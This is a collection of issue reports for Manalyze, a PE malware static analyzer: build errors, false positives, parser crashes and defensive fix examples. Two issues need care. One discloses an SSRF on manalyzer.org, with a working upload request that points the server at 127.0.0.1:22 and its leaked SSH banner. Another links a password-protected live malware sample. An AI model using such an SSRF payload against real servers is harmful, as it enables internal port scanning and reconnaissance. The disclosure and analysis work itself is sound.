justicerage / manalyze
A static analyzer for PE executables.
License: GNU General Public License v3.0
It was reported that PE files with a very high number of sections cause the analysis to be extremely slow.
The issue has been traced down to Section::get_raw_data() which opens and closes the input file with every call. The file handle should be cached and sanity checks need to be put in place to prevent unnecessary operations.
The result of PE::get_filesize should also be cached instead of being computed with every call.
Unusual section name found: .detourc
Unusual section name found: .detourd
These sections are added by detours:
https://github.com/microsoft/Detours/blob/master/src/disasm.cpp#L147
Reference:
https://github.com/microsoft/Detours
ld: unknown option: -rpath=$ORIGIN
clang: error: linker command failed with exit code 1 (use -v to see invocation)
make[2]: *** [bin/manalyze] Error 1
make[1]: *** [CMakeFiles/manalyze.dir/all] Error 2
make: *** [all] Error 2
An extra null pointer check is not needed in functions like the following.
Visual studio has a standardized PE format for delay loaded imports.
False positive for:
The PE is possibly packed.
Unusual section name found: .didat
This is:
"Delayload import table in its own .didat section"
Reference:
https://docs.microsoft.com/en-us/windows/win32/debug/pe-format
In need of suggestions. I'm not familiar with protocol.
Hello,
While updating our FileInfo Analyzer (TheHive Project) to include manalyzer binaries, we face lots of errors with the update of yara rules in clamav (bin/update_clamav_signatures.py):
[..]
Rule Win.Trojan.Emotet-9778251-0 seems to be malformed. Skipping...
Rule Win.Trojan.Generic-9778253-0 seems to be malformed. Skipping...
Rule Win.Malware.Fsysna-9778257-0 seems to be malformed. Skipping...
Rule Win.Packed.Vobfus-9778258-0 seems to be malformed. Skipping...
Rule Win.Trojan.Azorult-9778259-0 seems to be malformed. Skipping...
Rule Win.Malware.Sctk-9778260-0 seems to be malformed. Skipping...
Rule Win.Trojan.Fareit-9778261-0 seems to be malformed. Skipping...
Rule Win.Trojan.Fareit-9778262-0 seems to be malformed. Skipping...
Rule Win.Trojan.Generic-9778278-0 seems to be malformed. Skipping...
Rule Win.Malware.Zusy-9778280-0 seems to be malformed. Skipping...
[..]
I also tried to run it from the docker image and get similar results.
I noticed that Manalyzer sometimes returns a false positive when one brand's name is a substring of another. Here's an example: https://manalyzer.org/report/738583111ef0f36a57348bb735f6a3cc
The executable is supposed to be an installer for JetBrains' IntelliJ Platform, but Manalyzer thinks it's a fake Intel program.
System info:
uname -svrom: Linux 4.9.0-1-amd64 #1 SMP Debian 4.9.6-3 (2017-01-28) x86_64 GNU/Linux
lsb_release -c: stretch
When invoking command: make
The following error appears:
/home/pierre/Manalyze/plugins/plugin_virustotal/plugin_virustotal.cpp: In function ‘bool plugin::vt_api_interact(const string&, const string&, std::__cxx11::string&, plugin::sslsocket&)’:
/home/pierre/Manalyze/plugins/plugin_virustotal/plugin_virustotal.cpp:276:84: error: ‘SSL_R_SHORT_READ’ was not declared in this scope
if (error != boost::asio::error::eof && error.value() != ERR_PACK(ERR_LIB_SSL, 0, SSL_R_SHORT_READ)) {
^
CMakeFiles/plugin_virustotal.dir/build.make:62 : la recette pour la cible « CMakeFiles/plugin_virustotal.dir/plugins/plugin_virustotal/plugin_virustotal.cpp.o » a échouée
Hi,
in case Resource::extract() is called with an invalid destination argument the calling process segfaults because fwrite() tries to write to a FILE * object which in fact is NULL.
I'd consider this a minor bug, since one could argue using the API in a wrong way is the user's fault. However in that case you may want to avoid the segmentation fault and guide your users by providing an appropriate error message.
So a patch could look sth. like the following (disclaimer: untested!):
FILE* out = fopen(destination.string().c_str(), "a+");
+ if(out == nullptr) {
+ PRINT_ERROR << "Opening file " << destination.string().c_str() << " failed!" << std::endl;
+ return false;
+ }
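Review bot: the message on the added PRINT_ERROR line does not say why fopen() failed; appending strerror(errno) would let a user tell a missing directory from a permission problem. The .c_str() on destination.string() is redundant if PRINT_ERROR streams std::string the way it streams std::endl here. The placement of the check, directly after fopen() and before anything writes to out, is right.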
Cheers
rc0r
For example, a COM dll needs functions such as DllRegisterServer and DllCanUnloadNow.
boost::scoped_array<boost::uint32_t> names(new boost::uint32_t[ied.NumberOfNames]);
boost::scoped_array<boost::uint16_t> ords(new boost::uint16_t[ied.NumberOfNames]);
If ied.NumberOfNames is sufficiently big, there will be an unhandled bad alloc exception.
Sample (pass: infected):
https://mega.nz/#!V5pEgARQ!qwQsCH3enmjnv9--x_d4WDYyZpja1au2NYokzKKT7sQ
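One way to keep a header-supplied count such as NumberOfNames from driving the allocation, shown as an added example that is not Manalyze's code: the count is checked against the bytes the file can actually hold before anything is allocated. `read_table` and `make_sample` are hypothetical names, and the 32-byte sample is constructed.

```cpp
#include <cstdint>
#include <cstdio>
#include <vector>

// Hypothetical helper, not Manalyze's API. Reads `count` entries of type T
// stored at `offset`, but only if the file is large enough to contain them.
// Entries are copied raw, so a little-endian host is assumed (as PE is).
template <typename T>
bool read_table(FILE* f, uint64_t file_size, uint64_t offset,
                uint32_t count, std::vector<T>& out)
{
    out.clear();
    if (f == nullptr || offset > file_size) {
        return false;
    }
    // A table of `count` entries needs count * sizeof(T) bytes on disk.
    // Dividing instead of multiplying keeps the comparison overflow-free.
    if (count > (file_size - offset) / sizeof(T)) {
        return false;   // the header claims more than the file holds
    }
    if (fseek(f, static_cast<long>(offset), SEEK_SET) != 0) {
        return false;
    }
    out.resize(count);  // now bounded by the file size, not by the header
    if (count != 0 && fread(out.data(), sizeof(T), count, f) != count) {
        out.clear();
        return false;
    }
    return true;
}

// Constructed sample: a 32-byte file; the "name table" starts at offset 16.
FILE* make_sample()
{
    FILE* f = tmpfile();
    if (f == nullptr) return nullptr;
    unsigned char bytes[32];
    for (int i = 0; i < 32; ++i) bytes[i] = static_cast<unsigned char>(i);
    if (fwrite(bytes, 1, sizeof bytes, f) != sizeof bytes) {
        fclose(f);
        return nullptr;
    }
    return f;   // caller closes
}

int main()
{
    FILE* f = make_sample();
    if (f == nullptr) return 1;
    std::vector<uint32_t> names;
    std::vector<uint16_t> ords;
    bool sane = read_table(f, 32, 16, 4, names) && read_table(f, 32, 16, 4, ords);
    bool huge = read_table(f, 32, 16, 0xFFFFFFFFu, names);
    printf("NumberOfNames=4: %s\n", sane ? "accepted" : "rejected");
    printf("NumberOfNames=0xFFFFFFFF: %s\n", huge ? "accepted" : "rejected");
    fclose(f);
    return 0;
}
```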
Hello team,
I've detected a version disclosure (Nginx) in the target web server's HTTP response. This information might help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Nginx.
URL: https://manalyzer.org/
HTTP Response:
HTTP/1.1 200 OK
Server: nginx/1.2.1
Connection: keep-alive
Content-Encoding:
Strict-Transport-Security: max-age=15768000
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Date: Tue, 11 Apr 2017 00:02:26 GMT
identified version: 1.2.1
and you are using an out-of-date version of Nginx. Since this is an old version of the software, it may be vulnerable to attacks.
Hi!
I have a problem with the Yara rules. When I try to run an analysis (Example: manalyze sample.exe -p strings), I have the following error:
[!] Error: Could not load yara_rules/suspicious_strings.yara!
[!] Error: Could not load yara_rules/domains.yara!
* Manalyze 0.9 *
I checked the folder "/usr/local/manalyze/yara_rules" and there are Yara's rules.
Can you help me with this problem, please?
CAUTION: malware attached
The file in the attached zip gives an infinite loop when parsing resources, spamming the following error messages:
[*] Warning: The PE contains duplicate resources. It was almost certainly crafted manually.
[*] Warning: Could not locate the section containing resource 65280. Trying to use the RVA as an offset...
[*] Warning: Resource 65280 has a size of 0!
Seems to be related to size 0 resources.
FILE* f = fopen(_path.c_str(), "rb");
if (f == nullptr || fseek(f, _pointer_to_raw_data, SEEK_SET))
{
    fclose(f);
    return res;
}
This condition is wrong: if (f == nullptr) will trigger fclose(nullptr), which will lead to a crash.
I found that Manalyze can run in Win7. But it did not work in WinXP.
Is it true?
Hi,
I came across just another minor issue. Consider the following:
int main(int argc, char *argv[]) {
    // check argc == 2
    mana::PE pe(argv[1]);
    pe.get_raw_bytes(-1);
    return 0;
}
In case argv[1] is set to a nonexistent file this will segfault during fseek() called from PE::get_raw_bytes() since PE::_file_handle is not initialized and doesn't point to a proper FILE object.
Since all the other methods of the PE class that operate on _file_handle have a nullptr check I assumed such a check wasn't intentionally omitted.
Cheers
rc0r
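An added example, not Manalyze's code, covering both this report and the fclose(nullptr) report above: a reader that opens the file once, caches the handle and the size, and returns an empty result instead of passing a null FILE* to fseek() or fclose(). `RawFile`, `write_sample` and the file names are hypothetical, and the 16-byte sample file is constructed.

```cpp
#include <cstdint>
#include <cstdio>
#include <memory>
#include <string>
#include <vector>

// Hypothetical class, not Manalyze's: one fopen() per file, cached handle and size.
class RawFile
{
public:
    explicit RawFile(const std::string& path)
        : _handle(fopen(path.c_str(), "rb")), _size(0)
    {
        // A failed fopen() leaves _handle null; every method checks for that.
        if (_handle && fseek(_handle.get(), 0, SEEK_END) == 0) {
            long end = ftell(_handle.get());
            if (end > 0) _size = static_cast<uint64_t>(end);
        }
    }

    bool is_open() const { return _handle != nullptr; }
    uint64_t size() const { return _size; }   // computed once, in the constructor

    // Returns the bytes in [offset, offset + length), clamped to the file size.
    // Any failure yields an empty vector instead of touching a null FILE*.
    std::vector<uint8_t> read(uint64_t offset, uint64_t length) const
    {
        std::vector<uint8_t> res;
        if (!_handle || length == 0 || offset >= _size) return res;
        if (length > _size - offset) length = _size - offset;
        if (fseek(_handle.get(), static_cast<long>(offset), SEEK_SET) != 0) return res;
        res.resize(static_cast<size_t>(length));
        res.resize(fread(res.data(), 1, res.size(), _handle.get()));
        return res;
    }

private:
    // unique_ptr never invokes its deleter on a null pointer,
    // so fclose(nullptr) cannot happen on any exit path.
    struct Closer { void operator()(FILE* f) const { fclose(f); } };
    std::unique_ptr<FILE, Closer> _handle;
    uint64_t _size;
};

// Writes a constructed 16-byte sample (bytes 0..15) for the demo below.
bool write_sample(const std::string& path)
{
    FILE* f = fopen(path.c_str(), "wb");
    if (f == nullptr) return false;   // check first, close only a real handle
    unsigned char bytes[16];
    for (int i = 0; i < 16; ++i) bytes[i] = static_cast<unsigned char>(i);
    bool ok = fwrite(bytes, 1, sizeof bytes, f) == sizeof bytes;
    return fclose(f) == 0 && ok;
}

int main()
{
    write_sample("rawfile_sample.bin");
    {
        RawFile good("rawfile_sample.bin");
        printf("good: open=%d size=%llu tail=%zu bytes\n", good.is_open(),
               static_cast<unsigned long long>(good.size()), good.read(12, 100).size());
    }
    RawFile missing("no_such_file.bin");
    // The equivalent of get_raw_bytes(-1) on a nonexistent file: empty, no crash.
    printf("missing: open=%d read=%zu bytes\n", missing.is_open(),
           missing.read(0, UINT64_MAX).size());
    remove("rawfile_sample.bin");
    return 0;
}
```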
error info:
C:\Users\xxx\Desktop\manalyze>manalyze.exe --plugins=peid,clamav --dump all Churrasco.exe
[!] Error: [Yara compiler] yara_rules/clamav.yara(845778) : internal fatal error
I am confused about how to use it on Win7 and how yara integrates with it. Thanks.
Hello,
This might be a case of user error, but when I try to run parse_clamav.py against a custom set of clam rules (https://raw.githubusercontent.com/wmetcalf/clam-punch/master/miscreantpunch099.ldb) it'll generate an error
Unable to understand the following offset: 48344426616d703b48354126616d703b*48353426616d703b48363826616d703b48363926616d703b48373326616d703b48323026616d703b48373026616d703b48373226616d703b48366626616d703b48363726616d703b48373226616d703b48363126616d703b48366426616d703b
This appears to be from this line in the ldb file.
MiscreantPunch.EXEInsideOfDoc.ASASCII.2;Target:0;(0);48344426616d703b48354126616d703b*48353426616d703b48363826616d703b48363926616d703b48373326616d703b48323026616d703b48373026616d703b48373226616d703b48366626616d703b48363726616d703b48373226616d703b48363126616d703b48366426616d703b::i
Any help you can give would be greatly appreciated!
This is a snippet of the output. It seems nearly every rule breaks this.
Rule Win.Downloader.Upatre-9937450-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-9937452-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-9937455-0 seems to be malformed. Skipping...
Rule Win.Trojan.Generic-9937463-0 seems to be malformed. Skipping...
Rule Win.Ransomware.TeslaCrypt-9937465-0 seems to be malformed. Skipping...
Rule Win.Downloader.Stantinko-9937476-0 seems to be malformed. Skipping...
Rule Win.Trojan.Emotet-9937498-0 seems to be malformed. Skipping...
Rule Win.Packed.Msilzilla-9937499-0 seems to be malformed. Skipping...
LoadDriver
Yet another LoadLibrary replacement
LoadTypeLib
Possible LoadLibrary replacement?
waveInOpen|DirectSoundCaptureCreate
Records audio
EnableRouter|SetAdapterIpAddress|SetIpInterfaceEntry
Messes with the network configuration
OleGetClipboard
Reads the clipboard
CertAddCertificateContextToStore|CertOpenSystemStore
Manipulates the system certificate store
InitiateShutdown|ExitWindows
Turns the system off
Wmi*
Uses WMI
SHTestTokenMembership|CheckTokenMembership|IsUserAnAdmin
Checks for privileges
SHEnumKeyEx
Another way to access the registry
Analysis of this sample 8323af43ff507b82c87b38b45ea4c79fae4b49ed453590101373c18aae96b8fb does not end.
$ ./bin/manalyze --output=json 8323af43ff507b82c87b38b45ea4c79fae4b49ed453590101373c18aae96b8fb
I investigated a little bit, and I suspect that the parsing logic of resources contains some bugs.
I think that the recursive parsing of the resource tree does not end properly.
Hi there,
I'm trying to install Manalyze following the instructions on the documentation in the Linux section.
uname -a
Output:
Linux 4.18.0-17-generic #18~18.04.1-Ubuntu SMP Fri Mar 15 15:27:12 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
When I run sudo cmake . I get the following error stacktrace:
james@james-Aspire-VN7-593G:/home/Manalyze$ sudo cmake .
[sudo] password for james:
-- The C compiler identification is GNU 7.3.0
-- The CXX compiler identification is GNU 7.3.0
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Found Git: /usr/bin/git (found version "2.17.1")
-- Boost version: 1.65.1
-- Found the following Boost libraries:
-- regex
-- system
-- filesystem
-- program_options
-- Found OpenSSL: /usr/lib/x86_64-linux-gnu/libcrypto.so (found version "1.1.0g")
Checking out yara...
Cloning into 'external/yara'...
fatal: unable to access 'https://github.com/JusticeRage/yara.git/': Could not resolve host: github.com
Checking out hash-library...
Cloning into 'external/hash-library'...
CMake Error at CMakeLists.txt:131 (add_subdirectory):
add_subdirectory given source "external/yara" which is not an existing
directory.
-- Configuring incomplete, errors occurred!
See also "/home/Manalyze/CMakeFiles/CMakeOutput.log".
Any assistance would be greatly appreciated!
Many thanks
It seems that on Windows, when Manalyze is called from cmd.exe (and possibly other conditions), external plugins are not detected at all. The issue does not appear when using Powershell or the Git shell.
Does it support Mac os?
Hi
I am writing to you regarding an issue I encountered while installing the Manalyze program. After installing the necessary dependencies, when I proceeded to execute the command "make -j5," I encountered the following error:
/home/rpadmin/Manalyze-master/plugins/plugin_virustotal/json_spirit/json_spirit_reader_template.h:446:114: error: ‘boost::placeholders’ has not been declared
Uint64_action new_uint64 ( boost::bind( &Semantic_actions_t::new_uint64, &self.actions_, boost::placeholders::_1 ) );
I believe this error is related to the use of 'boost::placeholders' in the code, which seems to be causing a declaration issue. In order to resolve this problem, I would greatly appreciate your guidance and assistance.
Could you please provide me with instructions on how to address this error? I would be grateful for any insights or suggestions you can offer. I am eager to successfully install and utilize the Manalyze program for my needs.
Thank you for your attention to this matter. I look forward to your prompt response.
OS: UbuntuServer 16.04
For some reason my dll has an empty exports section.
A documentation page should be added to explain how to write Yara rules that rely on manalyze's parser.
C:\Users\50CAL\Manalyze\bin\yara_rules>python update_clamav_signatures.py
Downloading: main.cvd Bytes: 117892267
Rule Win.Trojan.EOL-1 seems to be malformed. Skipping...
The latest ClamAV rules are not converted properly and cause the ClamAV plugin to be dysfunctional.
[!] Error: Could not compile yara rules (1 error(s)).
[!] Error: ClamAV rules haven't been generated yet!
[!] Error: Please run yara_rules/update_clamav_signatures.py to create them, and refer to the documentation for additional information.
Hello,
In the file bin/yara_rules/peid.yara, the rule for PolyEnE_0_01__by_Lennart_Hedlund should be deleted because it detects false positives.
So please remove the following lines:
rule PolyEnE_0_01__by_Lennart_Hedlund
{
    meta:
        packer_name = "PolyEnE 0.01+ by Lennart Hedlund"
    strings:
        $a0 = { 60 00 00 E0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 60 00 00 E0 }
    condition:
        $a0
}
This is from the proxy stub code generated by midl.
Example: test_p.c
/* this ALWAYS GENERATED file contains the proxy stub code */
/* File created by MIDL compiler version 8.01.0628 */
...
#pragma code_seg(".orpc")
static const unsigned short IChildFrame_FormatStringOffsetTable[] =
{
0,
42,
84,
126
};
Manalyze/plugins/plugin_imports.cpp
Line 35 in d2fe760
are you missing an OR (|) at the end of the line?
Where can I learn to use the functions in the windows.h file ?
Hi,
fuzzing manalyze discovered the following crash:
original sample - DoS.dll (28K) (md5: acf1bffb70226d182bc0fef847f5c867)
The crash surfaced because afl-fuzz uses a memory limit during fuzzing. Running manalyze directly on the provided sample did not crash the process on my quite decent box. However massive amounts of virtual memory (>80Gb) were used when processing the file. This probably just didn't cause any real havoc because I have quite a large swap partition. Nevertheless this whole process bogged down my box for several minutes:
$ time manalyze DoS.dll
# ...
manalyze 170.76s user 280.52s system 65% cpu 11:28.31 total
To simulate a less powerful machine I used ulimit -v 10000000 limiting the virtual memory to ~10G. Using this setup manalyze SIGABRT's very soon:
$ ulimit -v 10000000 # kbytes
$ time manalyze DoS.dll
# ...
terminate called after throwing an instance of 'std::bad_alloc'
what(): std::bad_alloc
[2] 17055 abort (core dumped) ./manalyze
manalyze 7.59s user 8.62s system 14% cpu 1:52.14 total
$ ls -l core.17055
-rw------- 1 rc0r rc0r 9.5G Oct 24 11:20 core.17055
I did not try running this on a system with much less memory available than I had. But at best I'd expect the memory allocation to fail as in the ulimited test I did.
Let me know if you need any further info or assistance in order to diagnose the problem!
Ran the clamav update script but when running manalyze it does not compile the yara rules due to syntax errors
[!] Error: [Yara compiler] yara_rules/clamav.yara(972693) : syntax error, unexpected '{', expecting text string
[!] Error: [Yara compiler] yara_rules/clamav.yara(1003499) : syntax error, unexpected string identifier, expecting '}'
[!] Error: Could not compile yara rules (2 error(s)).
[!] Error: ClamAV rules haven't been generated yet!
[!] Error: Please run yara_rules/update_clamav_signatures.py to create them, and refer to the documentation for additional information.
I have run yara_rules/update_clamav_signatures.py however it seems to skip a lot of rules due to them being malformed.
E-mail received a few days ago:
I've been using your Manalyzer for a few days on Linux to try to triage some binaries. Thanks for all your work, btw. I'd like to start using it on a wider basis and would like to be able to do a "make install" to have it available to everyone on my Linux system. After a successful build, though:
[gcomeaux@localhost Manalyze]$ make install
make: *** No rule to make target `install'. Stop.
... Is there any way to easily get an installation with all dependencies in their proper place? I'm not a CMake expert, but there must be some way to specify a CMake target to get that working.
Thank you for any thoughts or suggestions.
EnumDeviceDrivers|GetDeviceDriverFileNameW
Checks for drivers
EvtClearLog|ClearEventLog
Empties the system event log
TerminateProcess
Messes with other processes
PrintWindow
Takes screenshots
SetKernelObjectSecurity|SetFileSecurity|SetNamedSecurityInfo|SetSecurityInfo
Manipulates DACLs
OpenSCManagerW|CreateService|DeleteService
Manipulates services
CoLoadLibrary
Replacement for LoadLibrary
Is there any way to save the JSON output to a file? I guess I could also parse through the console output, but it would be helpful to download it directly to a file.
I get that when I run update_clamav_signatures.py. Cropped result of this is below:
Rule Win.Dropper.Zeus-9956976-0 seems to be malformed. Skipping...
Rule Win.Malware.Generic-9956990-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Malware.Wingo-9956993-0. Skipping...
Rule Win.Virus.Expiro-9957000-0 seems to be malformed. Skipping...
Rule Win.Dropper.Zeus-9957002-0 seems to be malformed. Skipping...
Rule Win.Packed.Vbkryjetor-9957003-0 seems to be malformed. Skipping...
Rule Win.Malware.Conjar-9957004-0 seems to be malformed. Skipping...
Rule Win.Dropper.Detected-9957005-0 seems to be malformed. Skipping...
Rule Win.Dropper.Detected-9957006-0 seems to be malformed. Skipping...
Rule Win.Packed.Trojanx-9957008-0 seems to be malformed. Skipping...
Rule Win.Packed.Coantor-9957009-0 seems to be malformed. Skipping...
Rule Win.Packed.Msilheracles-9957011-0 seems to be malformed. Skipping...
Rule Win.Trojan.Generic-9957017-0 seems to be malformed. Skipping...
Rule Win.Packed.Generickdz-9957018-0 seems to be malformed. Skipping...
Rule Win.Dropper.LokiBot-9957019-0 seems to be malformed. Skipping...
Rule Win.Virus.Ramnit-9957027-0 seems to be malformed. Skipping...
Rule Win.Dropper.LokiBot-9957036-0 seems to be malformed. Skipping...
Rule Win.Dropper.Zeus-9957041-0 seems to be malformed. Skipping...
It happens for all of the downloaded updates
Clamav has recently started using Cloudflare to front their signature download page. If you use Python, then the response will be a 403. The text says that it wants cookies to be enabled. Using a web browser works fine to download the AV update package.
>>> import requests
>>> r = requests.get("http://database.clamav.net/daily.cvd")
>>> r
<Response [403]>
In malformed executables, section names may be composed of unprintable characters. These characters should be escaped to avoid outputting garbage to the console.
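One way to do the escaping requested above, as an added example rather than Manalyze's code. `escape_section_name` is a hypothetical helper; it takes the raw 8-byte Name field of a PE section header, which is NUL-padded but not NUL-terminated when all 8 bytes are used, and the sample names are constructed.

```cpp
#include <cstdio>
#include <string>

// Hypothetical helper: renders a raw 8-byte section name for console output.
// Printable ASCII passes through; every other byte becomes \xNN, so control
// sequences such as ESC [ 2 J never reach the terminal as live bytes.
std::string escape_section_name(const unsigned char (&raw)[8])
{
    std::string out;
    for (size_t i = 0; i < sizeof raw && raw[i] != 0; ++i) {
        unsigned char c = raw[i];
        if (c == '\\') {
            out += "\\\\";                    // keep the escaped form unambiguous
        } else if (c >= 0x20 && c < 0x7F) {
            out += static_cast<char>(c);
        } else {
            char buf[5];
            snprintf(buf, sizeof buf, "\\x%02x", static_cast<unsigned>(c));
            out += buf;
        }
    }
    return out;
}

int main()
{
    // Constructed samples: a normal name and one made of terminal control bytes.
    const unsigned char normal[8] = {'.', 't', 'e', 'x', 't', 0, 0, 0};
    const unsigned char hostile[8] = {0x1b, '[', '2', 'J', 0x07, 0xff, 'A', 'B'};
    printf("%s\n", escape_section_name(normal).c_str());
    printf("%s\n", escape_section_name(hostile).c_str());
    return 0;
}
```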
Use the data contained on this page to update the list of known packers and section names.
C:\Users\50CAL\Manalyze\bin\yara_rules>python update_clamav_signatures.py
Downloading: main.cvd Bytes: 117892267
Rule Win.Trojan.EOL-1 seems to be malformed. Skipping...
Downloading: daily.cvd Bytes: 41899296
Rule Eicar-Test-Signature already exists!
Unable to translate a logical signature for Html.Phishing.DropboxVM-1. Skipping...
Unable to translate a logical signature for Win.Worm.Njrat-2. Skipping...
Unable to translate a logical signature for Win.Trojan.B-468. Skipping...
Unable to translate a logical signature for Win.Dropper.Agent-1388636. Skipping...
Unable to translate a logical signature for Win.Dropper.Kuluoz-2905. Skipping...
Unable to translate a logical signature for Win.Trojan.Zbot-64725. Skipping...
Unable to translate a logical signature for Win.Downloader.Dalexis-24. Skipping...
Unable to translate a logical signature for Win.Trojan.Fareit-403. Skipping...
Unable to translate a logical signature for Win.Trojan.PoseidonURL-1. Skipping...
Unable to translate a logical signature for Win.Downloader.Upatre-6142. Skipping...
Unable to translate a logical signature for Legacy.Trojan.Agent-1388638. Skipping...
Unable to translate a logical signature for Win.Trojan.Mrblack-2. Skipping...
Unable to translate a logical signature for Win.Trojan.ProjectHook-1. Skipping...
Rule Win.Trojan.ssid18332-1 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.UPS-1. Skipping...
Unable to translate a logical signature for Win.Ransomware.Cerber-8. Skipping...
Unable to translate a logical signature for Win.Ransomware.Cerber-10. Skipping...
Rule Img.Exploit.CVE_2016_5684-1 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.Athena-5329665-0. Skipping...
Rule Txt.Downloader.Generic-5657804-1 seems to be malformed. Skipping...
Rule Txt.Downloader.Generic-5657855-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744087-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744089-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744090-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744092-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744093-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744094-0 seems to be malformed. Skipping...
Rule Win.Trojan.Xtreme-5744910-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.Vbswap-5909855-1. Skipping...
Unable to translate a logical signature for Win.Ransomware.Cerber-6162245-0. Skipping...
Rule Win.Exploit.CVE_2017_0080-6184298-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Ransomware.PyCL-6185098-3. Skipping...
Unable to translate a logical signature for Win.Trojan.ROKRAT-6189297-0. Skipping...
Unable to translate a logical signature for Win.Trojan.ROKRAT-6189299-0. Skipping...
Unable to translate a logical signature for Win.Trojan.Bladabindi-6196648-0. Skipping...
Unable to translate a logical signature for Win.Trojan.Bladabindi-6196650-0. Skipping...
Unable to translate a logical signature for Win.Virus.Hematite-6232506-0. Skipping...
Rule Swf.Exploit.CVE_2017_2934-6261685-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.Generic-6268209-0. Skipping...
Rule Win.Exploit.CVE_2016_3301-5259504-1 seems to be malformed. Skipping...
Rule Js.Downloader.Generic-6296416-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.Generic-6297788-0. Skipping...
Rule Win.Exploit.CVE_2017_3036-6309463-0 seems to be malformed. Skipping...
Rule Archive.Exploit.CVE_2017_2823-6316562-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.Generic-6323528-0. Skipping...
Rule Html.Exploit.CVE_2016_7288-6327688-0 seems to be malformed. Skipping...
Rule Win.Exploit.CVE_2017_2781-6316049-1 seems to be malformed. Skipping...
Unable to understand the following offset: 5c6a706567626c6970{-250}66666438
Hi manalyzer team
There is an SSRF on the request via URL upload; as you can see here, the SSH version you use is leaked in the response:
POST /upload HTTP/1.1
Host: manalyzer.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------210165242507531672849060397
Content-Length: 186
Origin: https://manalyzer.org
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------210165242507531672849060397
Content-Disposition: form-data; name="url"
http://127.0.0.1:22/
-----------------------------210165242507531672849060397--
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Sun, 03 Oct 2021 14:26:10 GMT
Content-Type: application/json
Content-Length: 192
Connection: close
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=63072000
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
{"data":{"error_message":"An error occurred while retrieving the requested file ((
'Connection aborted.', BadStatusLine('SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2\\r\\n')))."},"status":"failed"}
An attacker is able to scan internal ports and can also perform directory enumeration on http://127.0.0.1/$FUZZ$ ... To fix this, block access to internal hosts.
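A sketch of the fix the report asks for, as an added example that is not the manalyzer.org server code (which is not shown on this page): a fetcher resolves the submitted host, refuses to connect if any resolved address falls in an internal range, and then connects to the address it checked. `is_blocked_address` and `is_blocked_v4` are hypothetical names, the range list covers the common internal blocks rather than every reserved one, and the addresses in `main` are constructed samples.

```cpp
#include <arpa/inet.h>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <string>

// addr is in host byte order.
static bool is_blocked_v4(uint32_t addr)
{
    struct Range { uint32_t net; int prefix; };
    static const Range blocked[] = {
        {0x00000000u, 8},   // 0.0.0.0/8      "this network"
        {0x0A000000u, 8},   // 10.0.0.0/8     private
        {0x64400000u, 10},  // 100.64.0.0/10  carrier-grade NAT
        {0x7F000000u, 8},   // 127.0.0.0/8    loopback
        {0xA9FE0000u, 16},  // 169.254.0.0/16 link-local, cloud metadata
        {0xAC100000u, 12},  // 172.16.0.0/12  private
        {0xC0A80000u, 16},  // 192.168.0.0/16 private
        {0xE0000000u, 3},   // 224.0.0.0/3    multicast and reserved
    };
    for (const Range& r : blocked) {
        uint32_t mask = 0xFFFFFFFFu << (32 - r.prefix);
        if ((addr & mask) == r.net) return true;
    }
    return false;
}

// Takes one resolved address in text form. Anything that is not a strict
// IPv4 dotted quad or an IPv6 literal is refused, which also rejects
// host names and alternative spellings such as "0x7f.0.0.1".
bool is_blocked_address(const std::string& ip)
{
    in_addr v4;
    if (inet_pton(AF_INET, ip.c_str(), &v4) == 1) {
        return is_blocked_v4(ntohl(v4.s_addr));
    }
    in6_addr v6;
    if (inet_pton(AF_INET6, ip.c_str(), &v6) != 1) {
        return true;
    }
    const uint8_t* b = v6.s6_addr;
    static const uint8_t zeros[15] = {0};
    static const uint8_t mapped[12] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xFF, 0xFF};
    if (memcmp(b, zeros, 15) == 0 && b[15] <= 1) return true;   // :: and ::1
    if (memcmp(b, mapped, 12) == 0) {                           // ::ffff:a.b.c.d
        uint32_t a = (uint32_t(b[12]) << 24) | (uint32_t(b[13]) << 16) |
                     (uint32_t(b[14]) << 8) | uint32_t(b[15]);
        return is_blocked_v4(a);
    }
    if ((b[0] & 0xFE) == 0xFC) return true;                     // fc00::/7 unique local
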